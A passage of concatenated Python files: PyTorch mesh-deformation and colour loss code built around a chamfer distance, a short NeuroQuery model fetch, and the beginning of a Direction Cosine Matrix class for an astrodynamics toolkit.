dtype=torch.long, device=self.device).unsqueeze(0) if uvs_gt is not None else None vc_gt = torch.tensor(colors[self.part_n], dtype=torch.float, device=self.device) if self.options.texture: self.vc_gt = vc_gt = uv2color(vc_gt[:, :2], gt_texture) # save_obj(targets[self.part_n], faces_gt[self.part_n], '', 'tmp.obj', colors=vc_gt.detach().cpu().numpy()) f_gt = torch.tensor(faces_gt[self.part_n], dtype=torch.long, device=self.device).unsqueeze(0) gt_coord = torch.tensor(targets[self.part_n], device=self.device).float() pred_vc = self.delta_vc + 0.5 pred_coord = pred_coord.unsqueeze(0) if len(self.pred_coord) < self.options.batch_size: self.pred_coord.append(pred_coord) # self.pred_vc.append(pred_vc.unsqueeze(0)) # else: self.pred_coord[self.part_n] = pred_coord self.pred_vc[self.part_n] = pred_vc.unsqueeze(0) faces = torch.tensor(self.mesh[0].faces, dtype=torch.long, device=self.device).unsqueeze(0) face_uvs = torch.tensor(self.mesh[0].face_uvs, dtype=torch.long, device=self.device).unsqueeze(0) uvs = torch.tensor(self.mesh[0].uvs, dtype=torch.float, device=self.device) # if len(self.pred_uvs) < self.options.batch_size and uvs_gt is not None: # self.pre_uvs.append(sample_uv[0][idx2[0].long()]) sample_num = pred_vc.shape[0] * 10 # print(sample_num) if self.options.sample_gt: sampler_coord, sample_norm, sample_vc = sampler_color(f_gt, gt_coord.unsqueeze(0), sample_num, colors=vc_gt.unsqueeze(0), bypass=self.options.no_sample) dist1, dist2, idx1, idx2 = self.chamfer_dist(sampler_coord, self.pred_coord[self.part_n]) gt_color = sample_vc[0][idx2[0].long()] pre_color = pred_vc[idx1[0].long()] chamfer_loss = self.w_chamfer * torch.mean(torch.abs(pred_vc - gt_color)) + \ self.w_chamfer_op * torch.mean(torch.abs(pre_color - sample_vc)) loss = chamfer_loss elif self.options.texture: k = self.options.sample_gauss sigma = self.options.sample_sigma - self.options.sample_sigma * (self.options.cur_step % 500) / \ (500 * 2) sample_num = int(pred_vc.shape[0]) consistent_loss = self.cal_consistent_loss(faces[0], self.pred_vc[self.part_n][0], face_uvs[0], uvs, self.pred_texture) sample_coord, _, sample_uvs = sampler_uv(faces, self.pred_coord[self.part_n], 
sample_num, uvs=uvs.unsqueeze(0), face_uvs=face_uvs) sample_vc = uv2color(sample_uvs[0], self.pred_texture).unsqueeze(0) gt_coord = gt_coord.unsqueeze(0) pair_dist = self.pairwise_dist(gt_coord, sample_coord) # (B,M,N) sample_knn_dist, sample_knn_idx = pair_dist.topk(k, largest=False, dim=-1) gt_knn_dist, gt_knn_idx = pair_dist.topk(k, largest=False, dim=-2) gt_knn_idx = gt_knn_idx.permute(0, 2, 1).contiguous() gt_knn_dist = gt_knn_dist.permute(0, 2, 1).contiguous() gt_color = vc_gt[sample_knn_idx[0].view(-1)].view(-1, k, 3) gt_ratio = torch.exp(-(sample_knn_dist[0] / (2 * (sigma ** 2)))) mask = gt_ratio == 0 mask[:, 1:] = 0 gt_ratio[mask] = 1 gt_ratio = gt_ratio / torch.sum(gt_ratio, dim=-1, keepdim=True) gt_gauss_color = torch.sum(gt_color * gt_ratio.unsqueeze(-1), dim=1) pre_color = sample_vc[0][gt_knn_idx[0].view(-1)].view(-1, k, 3) pre_ratio = torch.exp(-(gt_knn_dist[0] / (2 * (sigma ** 2)))) mask = pre_ratio == 0 mask[:, 1:] = 0 pre_ratio[mask] = 1 pre_ratio = pre_ratio / torch.sum(pre_ratio, dim=-1, keepdim=True) pre_gauss_color = torch.sum(pre_color * pre_ratio.unsqueeze(-1), dim=1) texture_chamfer_loss = self.w_chamfer * torch.mean(torch.abs(sample_vc[0] - gt_gauss_color)) + \ self.w_chamfer_op * torch.mean(torch.abs(pre_gauss_color - vc_gt)) sample_coord, sample_norm, sample_vc = sampler_color(faces, self.pred_coord[self.part_n], sample_num, colors=self.pred_vc[self.part_n], bypass=self.options.no_sample) pair_dist = self.pairwise_dist(gt_coord, sample_coord) # (B,M,N) sample_knn_dist, sample_knn_idx = pair_dist.topk(k, largest=False, dim=-1) gt_knn_dist, gt_knn_idx = pair_dist.topk(k, largest=False, dim=-2) gt_knn_idx = gt_knn_idx.permute(0, 2, 1).contiguous() gt_knn_dist = gt_knn_dist.permute(0, 2, 1).contiguous() gt_color = vc_gt[sample_knn_idx[0].view(-1)].view(-1, k, 3) gt_ratio = torch.exp(-(sample_knn_dist[0] / (2 * (sigma ** 2)))) mask = gt_ratio == 0 mask[:, 1:] = 0 gt_ratio[mask] = 1 gt_ratio = gt_ratio / torch.sum(gt_ratio, dim=-1, keepdim=True) gt_gauss_color = torch.sum(gt_color * gt_ratio.unsqueeze(-1), dim=1) pre_color = sample_vc[0][gt_knn_idx[0].view(-1)].view(-1, k, 3) pre_ratio = torch.exp(-(gt_knn_dist[0] / (2 * (sigma ** 2)))) mask = pre_ratio == 0 mask[:, 1:] = 0 pre_ratio[mask] = 1 pre_ratio = pre_ratio / torch.sum(pre_ratio, dim=-1, keepdim=True) pre_gauss_color = torch.sum(pre_color * pre_ratio.unsqueeze(-1), dim=1) chamfer_loss = vertex_chamfer_loss = self.w_chamfer * torch.mean(torch.abs(sample_vc[0] - gt_gauss_color)) + \ self.w_chamfer_op * torch.mean(torch.abs(pre_gauss_color - vc_gt)) loss = consistent_loss + vertex_chamfer_loss + texture_chamfer_loss elif self.options.sample_gauss > 1: k = self.options.sample_gauss sigma = self.options.sample_sigma - self.options.sample_sigma * (self.options.cur_step % 500) / \ (500 * 2) sample_num = int(pred_vc.shape[0]) sample_coord, sample_norm, sample_vc = sampler_color(faces, self.pred_coord[self.part_n], sample_num, colors=self.pred_vc[self.part_n], bypass=self.options.no_sample) gt_coord = gt_coord.unsqueeze(0) pair_dist = self.pairwise_dist(gt_coord, sample_coord) # (B,M,N) sample_knn_dist, sample_knn_idx = pair_dist.topk(k, largest=False, dim=-1) gt_knn_dist, gt_knn_idx = pair_dist.topk(k, largest=False, dim=-2) gt_knn_idx = gt_knn_idx.permute(0, 2, 1).contiguous() gt_knn_dist = gt_knn_dist.permute(0, 2, 1).contiguous() gt_color = vc_gt[sample_knn_idx[0].view(-1)].view(-1, k, 3) gt_ratio = torch.exp(-(sample_knn_dist[0] / (2 * (sigma ** 2)))) mask = gt_ratio == 0 mask[:, 1:] = 0 gt_ratio[mask] = 1 gt_ratio 
= gt_ratio / torch.sum(gt_ratio, dim=-1, keepdim=True) gt_gauss_color = torch.sum(gt_color * gt_ratio.unsqueeze(-1), dim=1) pre_color = sample_vc[0][gt_knn_idx[0].view(-1)].view(-1, k, 3) pre_ratio = torch.exp(-(gt_knn_dist[0] / (2 * (sigma ** 2)))) mask = pre_ratio == 0 mask[:, 1:] = 0 pre_ratio[mask] = 1 pre_ratio = pre_ratio / torch.sum(pre_ratio, dim=-1, keepdim=True) pre_gauss_color = torch.sum(pre_color * pre_ratio.unsqueeze(-1), dim=1) chamfer_loss = self.w_chamfer * torch.mean(torch.abs(sample_vc[0] - gt_gauss_color)) + \ self.w_chamfer_op * torch.mean(torch.abs(pre_gauss_color - vc_gt)) loss = chamfer_loss elif self.options.sample_mix: if self.options.cur_step % 600 < 150: sampler_coord, sample_norm, sample_vc = sampler_color(f_gt, gt_coord.unsqueeze(0), sample_num, colors=vc_gt.unsqueeze(0), bypass=self.options.no_sample) dist1, dist2, idx1, idx2 = self.chamfer_dist(sampler_coord, self.pred_coord[self.part_n]) gt_color = sample_vc[0][idx2[0].long()] pre_color = pred_vc[idx1[0].long()] chamfer_loss = self.w_chamfer * torch.mean(torch.abs(pred_vc - gt_color)) + \ self.w_chamfer_op * torch.mean(torch.abs(pre_color - sample_vc)) loss = chamfer_loss else: sample_num = int(pred_vc.shape[0]) sampler_coord, sample_norm, sample_vc = sampler_color(faces, self.pred_coord[self.part_n], sample_num, colors=self.pred_vc[self.part_n], bypass=self.options.no_sample) dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), sampler_coord) pre_color = sample_vc[0][idx1[0].long()] dist1 = torch.sqrt(dist1) # dist1 = (dist1 + 1e-6) / torch.mean(dist1 + 1e-6) chamfer_loss = torch.mean(torch.abs(pre_color - vc_gt)) loss = chamfer_loss else: sample_num = int(pred_vc.shape[0]) sampler_coord, sample_norm, sample_vc = sampler_color(faces, self.pred_coord[self.part_n], sample_num, colors=self.pred_vc[self.part_n], bypass=self.options.no_sample) dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), sampler_coord) pre_color = sample_vc[0][idx1[0].long()] dist1 = torch.sqrt(dist1) # dist1 = (dist1+1e-6) / torch.mean(dist1+1e-6) chamfer_loss = torch.mean(torch.abs(pre_color - vc_gt)) loss = chamfer_loss # _, _, _, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), self.pred_coord) self.pred_vc[self.part_n][self.pred_vc[self.part_n] > 1] = 1 self.pred_vc[self.part_n][self.pred_vc[self.part_n] < 0] = 0 return loss, { "loss": loss, "loss_chamfer": chamfer_loss, "loss_texture": texture_chamfer_loss, "loss_consistent": consistent_loss, "loss_edge": edge_loss, "loss_area": area_loss, "loss_lap": lap_loss, "loss_beam": beam_loss } def pairwise_dist(self, xyz1, xyz2): r_xyz1 = torch.sum(xyz1 * xyz1, dim=2, keepdim=True) # (B,N,1) r_xyz2 = torch.sum(xyz2 * xyz2, dim=2, keepdim=True) # (B,M,1) mul = torch.matmul(xyz2, xyz1.permute(0, 2, 1)) # (B,M,N) dist = r_xyz2 - 2 * mul + r_xyz1.permute(0, 2, 1) # (B,M,N) return torch.abs(dist) def cal_consistent_loss(self, faces, colors, face_uvs, uvs, texture): faces_flatten = faces.view(-1) # (nf * 3) face_colors = colors[faces_flatten] # nf3 * 3 face_uvs_flatten = face_uvs.view(-1) # (nf * 3) face_uvs = uvs[face_uvs_flatten] # nf3 * 2 texture_colors = uv2color(face_uvs, texture) return torch.mean(torch.abs(texture_colors - face_colors)) # delta_e to delta_v def delta_e2c(self, output): mesh = self.mesh[0] output = output.squeeze(0).t() edges = mesh.edges edges_sides = mesh.edges_sides # print(output) vsd = torch.zeros(size=[len(mesh.vs), 24, 3], device=self.device) # 24 is max degree of vertex,maybe change vsd[edges[:, 0], edges_sides[:, 0], :] += 
output[:edges.shape[0], :3] vsd[edges[:, 1], edges_sides[:, 1], :] += output[:edges.shape[0], 3:] vsd = vsd.sum(dim=1) / (vsd != 0).sum(dim=1).float() if torch.any((vsd != 0).sum(dim=1).float() < 2e-5): print("error! NaN in delta_e2c") return vsd class MeshPriorLoss(nn.Module): def __init__(self, options): super(MeshPriorLoss, self).__init__() self.options = options self.chamfer_dist = ChamferDist() self.delta_vs = None self.delta_vc = None self.meshes = self.mesh = None self.device = None self.pred_coord = [] self.pred_color = [] self.w_edge = options.weight_edge_loss self.w_area = options.weight_area_loss self.w_normal = options.weight_normal_loss self.w_move = options.weight_move_loss self.w_chamfer = options.weight_chamfer self.w_chamfer_op = options.weight_chamfer_opposite self.w_lap = options.weight_lap_loss self.w_mse = options.weight_mse_loss self.w_beam = options.weight_beam_loss self.w_color = options.weight_color_loss self.l2_loss = nn.MSELoss(reduction='mean') self.part_n = None self.idx_init = None self.factor_xyz = torch.tensor([75.56538,23.655998,66.17292,-42.742756,-11.807249,-0.109063]).cuda() self.factor_dist = torch.tensor([37.95355899,7.98650955]).cuda() self.mid_point = torch.tensor([-3.1534e+00, -2.7057e-02, 3.0419e+01]).cuda() def forward(self, output, targets): loss = chamfer_loss = move_loss = edge_loss = normal_loss = lap_loss = beam_loss = 0 # for i,mesh in enumerate(self.meshes): self.mesh = np.asarray([self.meshes[self.part_n]]) self.delta_vs = self.delta_e2v(output) # geo_color or not if self.options.geo_color: self.delta_vc = self.delta_vs[:,3:] self.delta_vs = self.delta_vs[:,:3] # abs vs or not if self.options.abs_vs: pred_coord = self.delta_vs else: pred_coord = torch.tensor(self.mesh[0].vs, dtype=torch.float, device=self.device) + self.delta_vs pred_coord = pred_coord.unsqueeze(0) if len(self.pred_coord) < self.options.batch_size: self.pred_coord.append(pred_coord) # if self.options.geo_color: self.pred_color.append(pred_coord) else: self.pred_coord[self.part_n] = pred_coord faces = torch.tensor(self.mesh[0].faces, dtype=torch.long, device=self.device).unsqueeze(0) move_loss = self.w_move * F.smooth_l1_loss( self.delta_vs, torch.zeros_like(self.delta_vs), reduction='mean') if self.w_move > 0 else 0 edge_loss = self.w_edge * self.cal_edge_loss() if self.w_edge > 0 else 0 area_loss = self.w_area * self.cal_area_loss(faces, self.pred_coord[self.part_n]) if self.w_area > 0 else 0 gt_coord = torch.tensor(targets[0][self.part_n], device=self.device).float() # # chamfer_losss # if self.options.method == 'chamfer': # sample_num = int((self.options.ninput_edges / 2 + # self.options.cur_step * self.options.ninput_edges / self.options.epoch_steps)*2) # # sampler_coord, sample_norm, _ = sampler(faces, self.pred_coord[self.part_n], # # sample_num, bypass=self.options.no_sample) # # #sample uvs # sampler_coord, _, sample_uvs = sampler_uv( # torch.from_numpy(self.mesh[0].faces).unsqueeze(0).cuda(), # pred_coord, # sample_num, # torch.from_numpy(self.mesh[0].uvs).unsqueeze(0).cuda(), # torch.from_numpy(self.mesh[0].face_uvs).unsqueeze(0).cuda(), # ) # vc_gt = uv2color(sample_uvs[0],torch.from_numpy(self.mesh[0].texture).cuda()) # #gt_faces = torch.tensor(targets[1], dtype=torch.long, device=self.device).unsqueeze(0) # #sigma = self.options.ratio_gt_sample * ( 1 - (self.options.cur_step / self.options.epoch_steps)*0.5) # # if self.options.gt_sample: # # gt_sampler, _, ratio = sampler(gt_faces, gt_coord.unsqueeze(0), # # int(sample_num * 2), bypass=self.options.no_sample, 
# # sigma=sigma) # # dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_sampler, sampler_coord) # # ratio_gt_sample or not # # if self.options.ratio_gt_sample > 0.: # # # gt_sampler, _ ,ratio = sampler(gt_faces, gt_coord.unsqueeze(0), # # # int(sample_num*1.5), bypass=self.options.no_sample) # # dist1 *= ratio # # dist2 *= ratio[0][idx2.long()] # # else: # # dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), sampler_coord) # #geo_color # dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0),torch.from_numpy(self.mesh[0].vs).unsqueeze(0).cuda().float()) # vc_init = torch.from_numpy(targets[2][self.part_n]).cuda()[idx2[0].long()] # pred_vc = vc_init + self.delta_vc # sample_num = int((self.options.ninput_edges / 2 + # self.options.cur_step * self.options.ninput_edges / self.options.epoch_steps)*2) # #sample uvs # sample_coord, _, sample_uvs,sample_color = sampler_uv( # torch.from_numpy(self.mesh[0].faces).unsqueeze(0).cuda(), # pred_coord, # sample_num, # torch.from_numpy(self.mesh[0].uvs).unsqueeze(0).cuda(), # torch.from_numpy(self.mesh[0].face_uvs).unsqueeze(0).cuda(), # pred_vc.unsqueeze(0) # ) # vc_gt = uv2color(sample_uvs[0],torch.from_numpy(self.mesh[0].texture).cuda()) # dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), sample_coord) sample_num = int((self.options.ninput_edges / 2 + self.options.cur_step * self.options.ninput_edges / self.options.epoch_steps)*2) sample_coord, sample_norm, _ = sampler(faces, self.pred_coord[self.part_n],sample_num) dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), sample_coord) if self.w_mse>0: vc_uv = torch.from_numpy(self.mesh[0].vc[:, :2]).float() sample_coord, _, sample_uvs = sampler_uv( torch.from_numpy(self.mesh[0].faces).unsqueeze(0).cuda(), pred_coord, sample_num, torch.from_numpy(self.mesh[0].uvs).unsqueeze(0).cuda(), torch.from_numpy(self.mesh[0].face_uvs).unsqueeze(0).cuda(), ) mse_coord = uv2color(sample_uvs[0],torch.from_numpy(self.mesh[0].texture_np).cuda()) sample_coord = sample_coord.squeeze(0) if self.options.dist: sample_coord = torch.sqrt(torch.sum((sample_coord-self.mid_point)**2, dim=-1, keepdim=True)) #mse_coord = mse_coord*self.factor_dist[0] + self.factor_dist[1] else: mse_coord = mse_coord*self.factor_xyz[0:3] + self.factor_xyz[3:] dist1, dist2, idx1, idx2 = self.chamfer_dist(gt_coord.unsqueeze(0), sample_coord.unsqueeze(0)) #color_loss = self.l2_loss(vc_gt.unsqueeze(0),sample_color) * self.w_color if self.w_color > 0 else 0 color_loss = 0 mse_loss = self.l2_loss(sample_coord,mse_coord)*self.w_mse if self.w_mse > 0 else 0 chamfer_loss = self.w_chamfer * (torch.mean(torch.sqrt(dist1)) + self.w_chamfer_op * torch.mean(torch.sqrt(dist2))) normal_loss = self.w_normal * self.cal_normal_loss(pred_coord) if self.w_normal > 0 else 0 lap_loss = self.w_lap * \ self.cal_laplace_loss(self.mesh[0].vs, self.pred_coord[self.part_n]) if self.w_lap > 0 else 0 beam_loss = 0 # beam_loss = self.w_beam * self.cal_beam_loss(sampler_coord, sample_norm, gt_coord, # k=sample_num // self.options.beam_k_ratio, # radius=self.options.beam_rad) if self.w_beam > 0 else 0 # # fix_idx loss # elif self.options.method == 'fix_idx': # vs_init = self.mesh[0].vs # vs_init = torch.from_numpy(vs_init).float().unsqueeze(0).cuda() # _, _, idx, _ = self.chamfer_dist(gt_coord.unsqueeze(0), vs_init) # chamfer_loss = torch.mean( # torch.norm(pred_coord.squeeze(0)[idx.long().squeeze(0)] - gt_coord.squeeze(0), dim=1) ** 2) # normal_loss = lap_loss = beam_loss = 0. 
# # else: # raise loss = (chamfer_loss + move_loss + edge_loss + lap_loss + beam_loss + color_loss + mse_loss) # if beam_gap_loss > chamfer_loss: # self.options.weight_beam_gap /= 2.0 if move_loss > chamfer_loss * self.options.theta: self.w_move /= 2.0 if edge_loss > chamfer_loss * self.options.theta: self.w_edge /= 2.0 if area_loss > chamfer_loss * self.options.theta: self.w_area /= 2.0 # if normal_loss > chamfer_loss: # self.w_normal /= 1.5 if lap_loss > chamfer_loss: self.w_lap /= 2.0 return loss, { "loss": loss, "loss_chamfer": chamfer_loss, "loss_mse":mse_loss, "loss_normal": normal_loss, "loss_move": move_loss, "loss_edge": edge_loss, "loss_area": area_loss, "loss_lap": lap_loss, "loss_beam": beam_loss, "loss_color": color_loss } def cal_area_loss(self, faces, verts): batch_size = faces.shape[0] faces_flatten = faces.view(batch_size, -1) - 1 # b * (nv * 3) face_verts = verts[:, faces_flatten[0]].view(batch_size, -1, 3, 3) # b * nf * 3 * 3 for i in range(batch_size): # could batch? face_verts[i] = verts[i, faces_flatten[i]].view(-1, 3, 3) # nf * 3 * 3 v1 = face_verts[:, :, 1] - face_verts[:, :, 0] # b * nv * 3 v2 = face_verts[:, :, 2] - face_verts[:, :, 0] # b * nv * 3 # cal face areas areas = torch.sqrt( torch.sum(v1 * v1, dim=-1) * torch.sum(v2 * v2, dim=-1) - (torch.sum(v1 * v2, dim=-1)) ** 2 + 1e-7) / 2.0 return torch.mean(areas) def laplace_coord(self, input, lap_idx): input = input.type(torch.float32) idx = torch.tensor(lap_idx, dtype=torch.int64, device=self.device) mask = idx < 0 valid_idx = idx.clone() valid_idx[mask] = 0 v = input[valid_idx] v[mask] = 0 lap_coord = input - v.sum(dim=1) / (v.sum(dim=2) != 0).type(torch.float32).sum(dim=1).unsqueeze(-1) return lap_coord def cal_laplace_loss(self, input, output): input = torch.tensor(input, device=self.device) lap_in = self.laplace_coord(input, self.mesh[0].lap_idx) lap_out = self.laplace_coord(output.squeeze(0), self.mesh[0].lap_idx) lap_loss = self.l2_loss(lap_in, lap_out) * lap_in.size(-1) return lap_loss def pairwise_dist(self, xyz1, xyz2): r_xyz1 = torch.sum(xyz1 * xyz1, dim=2, keepdim=True) # (B,N,1) r_xyz2 = torch.sum(xyz2 * xyz2, dim=2, keepdim=True) # (B,M,1) mul = torch.matmul(xyz2, xyz1.permute(0, 2, 1)) # (B,M,N) dist = r_xyz2 - 2 * mul + r_xyz1.permute(0, 2, 1) # (B,M,N) return dist def cal_beam_loss(self, sample_coord, sample_norm, gt_coord, radius=1e-2, k=5): # TODO: very memory consuming, need some optimizations gt_coord = gt_coord.unsqueeze(0) pair_dist = self.pairwise_dist(gt_coord, sample_coord) # (B,M,N) sample_knn_dist, sample_knn_idx = pair_dist.topk(k, largest=False, dim=-1) gt_knn_dist, gt_knn_idx = pair_dist.topk(k, largest=False, dim=-2) gt_knn_thresh = gt_knn_dist[:, -1, :] sample_knn_thresh = gt_knn_thresh[0, sample_knn_idx] knn_mask = sample_knn_dist <= sample_knn_thresh knn_mask = torch.any(knn_mask, dim=-1) pair_dot = torch.matmul(sample_norm, gt_coord.permute(0, 2, 1)) pair_radius = pair_dist - pair_dot ** 2 mask = pair_radius > (radius ** 2) loss_mask = torch.all(mask, dim=-1) pair_dist[mask] = 1e5 min_dist, _ = torch.min(pair_dist, dim=-1) min_dist[loss_mask] = 0 min_dist[knn_mask] = 0 min_dist = torch.sqrt(torch.abs(min_dist)) beam_loss = torch.mean(min_dist) return beam_loss def cal_edge_loss(self): coord = self.pred_coord[self.part_n] edges = torch.tensor(self.mesh[0].edges, dtype=torch.long, device=self.device) edges_flatten = edges.reshape(-1) coord_flatten = coord[:, edges_flatten] edge_coords = coord_flatten.reshape((-1, 2, 3)) edge_length = torch.mean(torch.sum((edge_coords[:, 0] - 
edge_coords[:, 1]) ** 2, dim=1)) return edge_length def cal_normal_loss(self,vs): vs.squeeze_(0) mesh = self.mesh[0] edges = mesh.edge_points vec_edge01 = F.normalize(vs[edges[:, 0]] - vs[edges[:, 1]], dim=1) vec_edge02 = F.normalize(vs[edges[:, 0]] - vs[edges[:, 2]], dim=1) vec_edge03 = F.normalize(vs[edges[:, 0]] - vs[edges[:, 3]], dim=1) face1_normal = F.normalize(torch.mul(vec_edge01,vec_edge02),dim=1) face2_normal = F.normalize(torch.mul(vec_edge01,vec_edge03),dim=1) cos = 1 - torch.mean(torch.abs(torch.sum(face1_normal * face2_normal, dim=1))) # normals = F.normalize(v_normals[edges[:, 0]], dim=1) # cos = torch.mean(torch.abs(torch.sum(vec_edges * normals, dim=1))) # ##return cos # # face_side = mesh.face_side # edge1 = pred_coord[mesh.faces[:, 0]] - pred_coord[mesh.faces[:, 1]] # edge2 = pred_coord[mesh.faces[:, 1]] - pred_coord[mesh.faces[:, 2]] # face_normal = torch.mul(edge1, edge2) # v_normals = torch.zeros(size=[len(mesh.vs), 24, 3], device=self.device) # v_normals[:, face_side[:, :], :] += face_normal[face_side[:, :]] # v_normals = v_normals.sum(dim=1) # # normals = F.normalize(v_normals[edges[:, 0]], dim=1) # cos = torch.mean(torch.abs(torch.sum(vec_edges * normals, dim=1))) return cos # delta_e to delta_v def delta_e2v(self, output): mesh = self.mesh[0] output = output.squeeze(0).t() edges = mesh.edges edges_sides = mesh.edges_sides # print(output) vsd = torch.zeros(size=[len(mesh.vs), 24, 3], device=self.device) # 24 is max degree of vertex,maybe change vsd[edges[:, 0], edges_sides[:, 0], :] += output[:edges.shape[0], :3] vsd[edges[:, 1], edges_sides[:, 1], :] += output[:edges.shape[0], 3:] vsd = vsd.sum(dim=1) / (vsd != 0).sum(dim=1).float() return vsd # Chamfer's distance module @thibaultgroueix # GPU tensors only class ChamferFunction(Function): @staticmethod def forward(ctx, xyz1, xyz2): batchsize, n, _ = xyz1.size() _, m, _ = xyz2.size() dist1 = torch.zeros(batchsize, n) dist2 = torch.zeros(batchsize, m) idx1 = torch.zeros(batchsize, n).type(torch.IntTensor) idx2 = torch.zeros(batchsize, m).type(torch.IntTensor) dist1 = dist1.cuda() dist2 = dist2.cuda() idx1 = idx1.cuda() idx2 = idx2.cuda() chamfer.forward(xyz1, xyz2, dist1, dist2, idx1, idx2) ctx.save_for_backward(xyz1, xyz2, idx1, idx2) return dist1, dist2, idx1, idx2 @staticmethod def backward(ctx, graddist1, graddist2, _idx1, _idx2): xyz1, xyz2, idx1, idx2 = ctx.saved_tensors graddist1 = graddist1.contiguous() graddist2 = graddist2.contiguous() gradxyz1 = torch.zeros(xyz1.size()) gradxyz2 = torch.zeros(xyz2.size()) gradxyz1 = gradxyz1.cuda() gradxyz2 = gradxyz2.cuda() chamfer.backward(xyz1, xyz2, gradxyz1, gradxyz2, graddist1, graddist2, idx1, idx2) return gradxyz1, gradxyz2 class ChamferDist(nn.Module): def __init__(self): super(ChamferDist, self).__init__() def forward(self, input1, input2): return ChamferFunction.apply(input1, input2) if __name__ == "__main__": batch_size = 8 n, m = 30, 20 xyz1 = torch.rand((batch_size, n, 3)).cuda() xyz2 = torch.rand((batch_size, m, 3)).cuda() # # dist1 = torch.zeros(batch_size, n).cuda() # dist2 = torch.zeros(batch_size, m).cuda() # # idx1 = torch.zeros((batch_size, n), dtype=torch.int).cuda() # idx2 = torch.zeros((batch_size, m), dtype=torch.int).cuda() # # chamfer.forward(xyz1, xyz2, dist1, dist2, idx1, idx2) # print(dist1) # print(dist2) # print(idx1) # print(idx2) a = ChamferDist() print("test") print(a(xyz1, xyz2))
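
# Editor's note: quick sanity check (not part of the original module) for the
# pairwise_dist() expansion used above, ||a - b||^2 = ||a||^2 + ||b||^2 - 2 a.b,
# verified against torch.cdist. Illustrative only; never called.
def _check_pairwise_dist():
    xyz1 = torch.rand(2, 7, 3)  # (B, N, 3)
    xyz2 = torch.rand(2, 5, 3)  # (B, M, 3)
    expanded = (torch.sum(xyz2 * xyz2, dim=2, keepdim=True)
                - 2 * torch.matmul(xyz2, xyz1.permute(0, 2, 1))
                + torch.sum(xyz1 * xyz1, dim=2, keepdim=True).permute(0, 2, 1))  # (B, M, N)
    reference = torch.cdist(xyz2, xyz1) ** 2  # (B, M, N)
    print(torch.allclose(expanded, reference, atol=1e-5))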
nilq/baby-python
python
# Download (or locate the cached copy of) the NeuroQuery model data, then
# construct the image-search helper that uses it.
from neuroquery import datasets
from neuroquery_image_search import NeuroQueryImageSearch

datasets.fetch_neuroquery_model()
NeuroQueryImageSearch()
nilq/baby-python
python
# -*- coding: utf-8 -*- """ dcm - Direction Cosine Matric (DCM) class for Astrodynamic Toolkit Copyright (c) 2017 - Michael Kessel (mailto: the.rocketredneck@gmail.com) a.k.a. RocketRedNeck, RocketRedNeck.com, RocketRedNeck.net RocketRedNeck and MIT Licenses RocketRedNeck hereby grants license for others to copy and modify this source code for whatever purpose other's deem worthy as long as RocketRedNeck is given credit where where credit is due and you leave RocketRedNeck out of it for all other nefarious purposes. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. **************************************************************************************************** """ import numpy as np from Astro import Quaternion class dcm(np.ndarray): ''' % DCM Direction Cosine Matrix (DCM) constructor % Creates a dcm object which conforms to DCM mathematics and allows % operations on a series of DCMs (N, used to represent a time varying % DCM). % % Usage: M = dcm; % Template % M = dcm(x); % M = dcm(x,option); % % Inputs: x Any of the following forms: % (3x3)xN double % 3x3 (assumes N=1) % 9xN double (stacked DCM, see option) % 4xN double (assumed quaternion) % quaternion % dcm % % option Either 'rows' (default) or 'columns' indicating the 9xN % form is to be interpreted as stack transposed rows, or % stacked columns, respectively. % % Outputs: M The dcm object. % % See also quaternion % %============================================================================== ''' def __new__(cls,data=None, **kwargs): # Most common issue in here is the dimension of the inputs # Crease an exception we can just reference for convenience dimError = ValueError('Only Nx3x3, Nx1x4, Nx1x9, dcm, or quaternion allowed.') if data is None: data = np.zeros([1,3,3]) data[:,0,0] = 1 data[:,1,1] = 1 data[:,2,2] = 1 # If a quaternion was passed in, just return it at exit # All other type cases require more scrutiny inType = type(data) if (issubclass(inType,dcm)): d = data elif (issubclass(inType,list) or issubclass(inType,np.ndarray)): # TODO: If data has units, strip the units they are not required d = np.array(data).view(cls) # Parse the dimensions to fiqure out what we have # t slices (in "time" or sequence) # r rows # c columns numDim = len(d.shape) if (numDim < 2): raise dimError if (numDim < 3): t = 1 d = d[np.newaxis,...] 
else: t = d.shape[0] r = d.shape[1] c = d.shape[2] if ((r==3) and (c==3)): # The object already looks like a 3x3 DCM # we won't assess the normality, just pass it back pass elif ((r==1) and (c==4)): # Object looks like a tx1x4 stream of quaternions # We don't assess normality, we just convert element # by element q = d qsq = q ** 2 q01 = q[:,0] * q[:,1] q02 = q[:,0] * q[:,2] q03 = q[:,0] * q[:,3] q12 = q[:,1] * q[:,2] q13 = q[:,1] * q[:,3] q23 = q[:,2] * q[:,3] d = np.ndarray([t, 3, 3]); d[:,0,0] = 1 - 2*(qsq[:,2]+qsq[:,3]) d[:,0,1] = 2*(q12 - q03) d[:,0,2] = 2*(q13 + q02) d[:,1,0] = 2*(q12 + q03) d[:,1,1] = 1 - 2*(qsq[:,3]+qsq[:,1]) d[:,1,2] = 2*(q23 - q01) d[:,2,0] = 2*(q13 - q02) d[:,2,1] = 2*(q23 + q01) d[:,2,2] = 1 - 2*(qsq[:,1]+qsq[:,2]) elif ((r==1) and (c==9)): # Parse the keyword arguments, extracting what makes sense # and tossing what doesn't rowcol = None for key in kwargs: if (key.lower() == 'direction'): rowcol = 